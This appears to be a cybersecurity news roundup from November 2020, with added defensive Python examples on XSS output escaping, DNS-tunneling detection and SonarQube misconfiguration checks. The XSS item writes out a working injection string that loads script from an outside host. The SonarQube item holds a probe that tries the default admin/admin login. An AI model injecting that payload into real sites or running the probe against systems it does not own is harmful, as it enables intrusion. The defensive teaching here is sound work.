Cyber Security Headlines – November 10, 2020

Inrupt launches enterprise privacy platform

In 2017, Tim Berners-Lee launched a company called Inrupt to market products built on the open-source Solid system. On Monday, Inrupt announced an enterprise product that lets developers build apps on top of Solid’s Personal Online Data Stores, or Pods. Pods are meant to keep personal data under the user’s control, released to applications only with the user’s explicit consent. Inrupt’s enterprise platform uses a Solid Server to manage the Pods and provides an SDK through which developers access Pod data for specific, consented purposes. Inrupt worked with the BBC, the UK’s National Health Service and the Government of Flanders in Belgium to develop the platform. 

(TechCrunch)

India’s Bigbasket confirms cyberattack

Co-founder and CEO Hari Menon confirmed the attack, in which the personal information of millions of Indian users was stolen. The exfiltrated data includes email addresses, mobile phone numbers and full postal addresses. Security researchers at Cyble first reported the attack after spotting the data for sale on the dark web. Experts warn that the leaked data could be used to target users with phishing attacks. Bigbasket is based in Bangalore, which currently has eight cybercrime units. However, these units are headed by police inspectors, and their staff often lack the training to investigate many types of online attack. 

(Bloomberg)

What’s in a name? Turns out malware

A British software engineer thought it would be funny to name his company after a cross-site scripting payload, so he registered it as SCRIPT SRC=HTTPS://MJT.XSS.HT LTD, complete with the quotation marks and angle brackets that make it valid HTML. The important part is the start of the name: a closing quotation mark and a closing angle bracket, which terminate whatever attribute or tag the name has been pasted into, followed by a script tag. Any site that rendered the company name without escaping it would therefore hand the browser a script element, which would load a probe from XSS Hunter, a service testers use to detect blind cross-site scripting. The name was registered with Companies House, the UK’s registrar of companies. When the director found that it was causing minor problems for sites consuming the register, he reported it to Companies House and the UK’s National Cyber Security Centre and disclosed it to no one else. The company has since been renamed THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD.
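The bug the company name was built to trigger is output encoding, so here is an added example (not code from the Guardian story or from the engineer) that renders a company name into an HTML attribute both ways and then parses the result with Python’s standard library to see whether a script element came out. The name is constructed from the article’s description (a double quote and a closing angle bracket, then a script tag pointing at mjt.xss.ht) rather than copied from the Companies House register, and the form field it is rendered into is hypothetical.

```python
import html
from html.parser import HTMLParser

# Constructed per the article's description of the registered name: it opens
# with a double quote and a closing angle bracket, so wherever it is pasted
# into HTML without escaping it closes the surrounding attribute and tag.
COMPANY_NAME = '"><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD'


def render_unsafe(name: str) -> str:
    """Vulnerable: the name is interpolated into an attribute with no encoding.
    A name beginning with '">' ends the attribute and the input tag early."""
    return f'<input name="company" value="{name}">'


def render_safe(name: str) -> str:
    """Hardened: html.escape(quote=True) turns <, >, &, " and ' into entities,
    so the browser sees one input element whose value happens to contain HTML."""
    return f'<input name="company" value="{html.escape(name, quote=True)}">'


class _TagCollector(HTMLParser):
    """Records every start tag the parser sees, with its (unescaped) attributes."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def start_tags(markup: str) -> list:
    """Parse markup the way a browser would and return [(tag, {attr: value}), ...]."""
    parser = _TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


def script_sources(markup: str) -> list:
    """The src of every <script> element in the markup; empty means no injection."""
    return [attrs.get("src") for tag, attrs in start_tags(markup) if tag == "script"]


if __name__ == "__main__":
    for label, render in (("unsafe", render_unsafe), ("safe", render_safe)):
        markup = render(COMPANY_NAME)
        print(f"{label}: {markup}")
        print(f"  tags: {[t for t, _ in start_tags(markup)]}")
        print(f"  scripts loaded: {script_sources(markup)}")
```

The unsafe rendering parses as an input element followed by a script element whose src is the XSS Hunter host; the escaped rendering parses as a single input element whose value attribute, once the parser decodes the entities, is the original company name unchanged. The fix is the same for any registry-fed field: encode for the context (attribute, element body, URL, JavaScript string) at the point of output, never trust that a value came from an official source.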

(The Guardian)

FTC reaches settlement with Zoom

The US Federal Trade Commission announced that it has reached a settlement with Zoom over “a series of deceptive and unfair practices that undermined the security of its users.” The FTC specifically investigated Zoom’s claim that meetings were end-to-end encrypted when in fact Zoom itself held the cryptographic keys, so the company could have decrypted and viewed customer meetings. The FTC also found that Zoom stored some meeting recordings unencrypted and criticized Zoom’s practice of silently installing a local web server on users’ machines to speed up joining meetings. Zoom has since pushed an update that removes the web server and has begun rolling out genuine end-to-end encryption. The settlement forbids Zoom from misrepresenting its security and privacy practices going forward and requires it to run a vulnerability management program. 

(TechCrunch)

Thanks to our sponsor, Blumira

The shift to cloud-based productivity and collaboration tools is a necessity and reality for many CISOs these days – but visibility into cloud threats can be challenging with limited staff and resources. Automating your security operations workflow is easier with Blumira’s detection and response platform. Integrate Office 365 with Blumira to start realizing security value in a matter of hours with a free 14-day trial at Blumira.com.

PowerShell backdoors discovered in Microsoft Exchange attack

Security researchers at Palo Alto Networks discovered two new PowerShell backdoors in an attack by the xHunt threat group on an organization in Kuwait. The researchers named the backdoors “TriFive” and “Snugy”; both use “covert channels for C2 communications, specifically DNS tunneling and an email-based channel using drafts in the Deleted Items folder of a compromised email account.” The backdoors were first seen in September, although the researchers do not know how the attackers gained initial access to the Exchange server. 
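The item names DNS tunneling as one of the two C2 channels but not how a defender would notice it, so here is an added detection example (not Palo Alto’s code and not an xHunt indicator). It scores each registered domain in a resolver log on three signals that encoded data shares and ordinary hostnames do not: long subdomains, high character entropy, and subdomains that almost never repeat. The log lines, client addresses and domain names are constructed for this example, and the two-label rule for finding the registered domain is a simplification noted in the code.

```python
import math
from collections import defaultdict

# Constructed sample of a resolver log: "<timestamp> <client> <qname> <qtype>".
# The tunnelled labels are hex permutations chosen for the example; nothing
# here is a real indicator from the xHunt report.
SAMPLE_LOG = """\
2020-09-01T10:00:01Z 10.0.0.5 www.example.com A
2020-09-01T10:00:02Z 10.0.0.5 mail.example.com A
2020-09-01T10:00:03Z 10.0.0.7 www.example.com A
2020-09-01T10:00:04Z 10.0.0.7 cdn.example.com A
2020-09-01T10:00:05Z 10.0.0.5 api.example.com A
2020-09-01T10:00:06Z 10.0.0.5 www.example.com A
2020-09-01T10:00:07Z 10.0.0.9 example.org A
2020-09-01T10:00:08Z 10.0.0.9 3f9a1c7e0b5d2486.d41e8f0c2a6b7935.tunnel-example.net TXT
2020-09-01T10:00:09Z 10.0.0.9 7c2b9e4f1a8d0635.a05e3d8c6f1b9472.tunnel-example.net TXT
2020-09-01T10:00:10Z 10.0.0.9 6b8f2d0a4c9e1357.e93c5a1f7b0d2648.tunnel-example.net TXT
2020-09-01T10:00:11Z 10.0.0.9 1d7a4e9b0f3c8526.c28f6b3e5d0a9174.tunnel-example.net TXT
2020-09-01T10:00:12Z 10.0.0.9 5e0b7c1a9f4d3862.94a3f6e0c1b8d527.tunnel-example.net TXT
2020-09-01T10:00:13Z 10.0.0.9 b7d1e5a20c4f8396.0f6c3b9d8e2a5714.tunnel-example.net TXT
"""


def shannon_entropy(s: str) -> float:
    """Bits per character of s; 0.0 for the empty string."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_qname(qname: str):
    """Return (subdomain, registered_domain). Simplification: the registered
    domain is the last two labels; real tooling should use the Public Suffix
    List, since names under co.uk and similar break this rule."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) <= 2:
        return "", ".".join(labels)
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def parse_log(text: str):
    """Yield (client, qname) from the constructed log format, skipping short lines."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 4:
            yield parts[1], parts[2]


def domain_stats(text: str) -> dict:
    """Per registered domain: query count, share of subdomains that are unique,
    mean subdomain length, and mean entropy of the subdomain characters
    (dots excluded, so label boundaries do not inflate the score)."""
    subs = defaultdict(list)
    for _client, qname in parse_log(text):
        sub, dom = split_qname(qname)
        subs[dom].append(sub)
    stats = {}
    for dom, seen in subs.items():
        n = len(seen)
        stats[dom] = {
            "queries": n,
            "unique_ratio": len(set(seen)) / n,
            "avg_len": sum(len(s) for s in seen) / n,
            "avg_entropy": sum(shannon_entropy(s.replace(".", "")) for s in seen) / n,
        }
    return stats


def flag_tunneling(text: str, min_queries=5, min_len=20.0,
                   min_unique=0.8, min_entropy=3.0) -> list:
    """Domains whose subdomain traffic looks like encoded data rather than
    hostnames: enough queries to judge, long labels, high entropy, and values
    that almost never repeat (a hostname cache would repeat them)."""
    return sorted(
        dom for dom, s in domain_stats(text).items()
        if s["queries"] >= min_queries and s["avg_len"] >= min_len
        and s["unique_ratio"] >= min_unique and s["avg_entropy"] >= min_entropy
    )


if __name__ == "__main__":
    for dom, s in domain_stats(SAMPLE_LOG).items():
        print(dom, s)
    print("suspected tunneling:", flag_tunneling(SAMPLE_LOG))
```

On the constructed log only tunnel-example.net trips all four thresholds: six queries, every subdomain distinct, 33 characters each, and exactly 4 bits per character because every label is a permutation of the sixteen hex digits. The ordinary domain averages about three characters and under one bit, and the bare example.org query shows the empty-subdomain edge case scoring zero rather than crashing. In production the thresholds need tuning against your own baseline (CDNs and anti-spam lookups legitimately produce long, high-entropy labels), and the email-drafts channel described in the same report needs a different detector entirely, on mailbox audit logs rather than DNS.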

(ThreatPost)

FBI warns of misconfiguration causing stolen source code repositories

Misconfigured SonarQube code-analysis servers are the root cause, with intrusions dating back to April 2020 and affecting government agencies and private companies. The FBI sent a private notice to affected parties last month before going public this week. SonarQube is a web application that organizations connect to their code repositories so that source can be tested for quality and security issues through a browser. Many organizations, however, ran it with the default settings: the built-in “admin” account with “admin” as its password, listening on port 9000 and reachable from the internet. As far back as 2018, security researcher Bob Diachenko noted that 30-40% of the SonarQube instances exposed online had no authentication in place at all. The FBI recommends changing the default configuration, starting with the admin credentials, so that attackers cannot pull source code from the connected repositories. 
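To find the condition the FBI describes before an attacker does, here is an added probe (not FBI or SonarQube code) that checks one instance for both problems in the item: anonymous access and the default admin/admin login. It rests on one assumption about SonarQube’s Web API, stated again in the code: GET api/authentication/validate answers {"valid": true} when the caller is authenticated and also when the server does not force authentication, which is what makes the unauthenticated probe informative. The transport is injectable so the decision logic can be exercised offline; the hostname in the usage line is a placeholder.

```python
import base64
import json
import urllib.request
from urllib.error import HTTPError, URLError

# Assumption about SonarQube's Web API (added example, not SonarQube code):
# api/authentication/validate returns {"valid": true} for an authenticated
# caller, and for an anonymous one when forced authentication is switched off.
VALIDATE = "/api/authentication/validate"
DEFAULT_CREDS = ("admin", "admin")   # the shipped default the FBI notice warns about


def http_get_json(url, auth=None, timeout=5):
    """Real transport: HTTP GET with optional Basic auth.
    Returns (status, parsed JSON body or None); status None means unreachable."""
    req = urllib.request.Request(url)
    if auth is not None:
        token = base64.b64encode(f"{auth[0]}:{auth[1]}".encode()).decode()
        req.add_header("Authorization", f"Basic {token}")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            raw = resp.read().decode("utf-8", "replace")
            return resp.status, (json.loads(raw) if raw else None)
    except HTTPError as err:          # 401/403 etc. still tell us something
        return err.code, None
    except (URLError, OSError, ValueError):
        return None, None


def _says_valid(body) -> bool:
    return isinstance(body, dict) and body.get("valid") is True


def assess_sonarqube(base_url: str, fetch=http_get_json) -> list:
    """Probe one instance and return a list of finding strings (empty = clean).
    `fetch(url, auth=None)` is injectable so the logic can run without a server."""
    url = base_url.rstrip("/") + VALIDATE
    status, body = fetch(url, auth=None)
    if status is None:
        return ["unreachable"]
    findings = []
    if _says_valid(body):
        findings.append("anonymous access allowed (forced authentication is off)")
    status, body = fetch(url, auth=DEFAULT_CREDS)
    if status == 200 and _says_valid(body):
        findings.append("default credentials admin/admin accepted")
    return findings


if __name__ == "__main__":
    import sys
    # Placeholder target; point it at your own instance on the default port 9000.
    target = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:9000"
    print(target, assess_sonarqube(target) or ["no findings"])
```

Run it only against instances you own or are authorized to test. A default install reports both findings; a hardened one, where the anonymous call answers valid false and the admin/admin call is rejected with a 401, reports none. Fixing the findings means changing the admin password, turning forced authentication on, and keeping the instance off the public internet, since an attacker with the admin account can read every repository the server is connected to.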

(ZDNet)

Compal Electronics hit with ransomware

The Taiwanese ODM suffered the attack over the weekend. According to a leaked ransom note, the DoppelPaymer ransomware gang was behind it. By the time the attack was discovered on November 8th, 30% of endpoints had been infected, and Compal shut down its network to stop it spreading further. Compal is the second largest contract laptop manufacturer after Quanta, but said its production lines were unaffected. The company denied media reports that the attackers were blackmailing it with a threatened data leak.

(Security Affairs)

China’s top hacking contest claims Windows 10, iOS, and Chrome

The third edition of the Tianfu Cup saw 15 hacking teams participate, each getting three five-minute attempts to breach its chosen target with an original exploit. A team from Qihoo 360 accounted for almost two-thirds of the entire prize pool, going home with $744,500 of the $1,210,000 awarded this year. Other targets successfully breached include Adobe PDF Reader, Ubuntu, Docker, VMware ESXi, and TP-Link router firmware. Patches for all the exploits are expected in the coming days. 

(ZDNet)


Rich Stroffolino
Rich Stroffolino is a podcaster, editor and writer based out of Cleveland, Ohio. Since 2015, he's worked in technology news podcasting and media. He dreams of someday writing the oral history of Transmeta.